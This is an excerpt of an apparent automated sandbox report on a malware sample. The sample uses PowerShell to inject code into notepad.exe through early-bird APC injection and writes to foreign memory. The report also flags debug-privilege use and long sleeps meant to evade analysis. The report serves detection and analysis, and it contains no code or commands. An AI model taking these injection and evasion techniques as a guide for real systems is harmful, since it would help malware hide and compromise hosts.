Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\notepad.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\System32\notepad.exe Memory allocated: 29B03A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\notepad.exe Memory allocated: 29B1BC10000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\notepad.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5507 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4131 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\notepad.exe TID: 2500 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\notepad.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\notepad.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\notepad.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\System32\notepad.exe Jump to behavior
Hijacks the control flow in another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 6828 base: 29B01FA001D value: FF Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 6828 base: 29B01FA0044 value: FF Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 6828 base: 29B01FA00F6 value: E9 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 6828 base: 29B01FA0121 value: FF Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 6828 base: 29B01FA0174 value: E9 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\System32\notepad.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0001 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0002 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0003 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0004 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0005 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0006 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0007 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0008 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0009 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA000A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA000B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA000C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA000D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA000E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA000F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0010 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0011 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0012 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0013 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0014 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0015 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0016 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0017 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0018 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0019 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA001A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA001B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA001C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA001D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA001E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA001F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0020 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0021 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0022 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0023 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0024 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0025 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0026 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0027 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0028 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0029 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA002A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA002B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA002C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA002D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA002E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA002F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0030 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0031 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0032 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0033 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0034 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0035 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0036 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0037 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0038 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0039 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA003A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA003B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA003C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA003D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA003E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA003F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0040 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0041 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0042 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0043 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0044 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0045 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0046 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0047 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0048 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0049 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA004A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA004B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA004C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA004D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA004E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA004F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0050 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0051 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0052 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0053 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0054 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0055 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0056 Jump to behavior
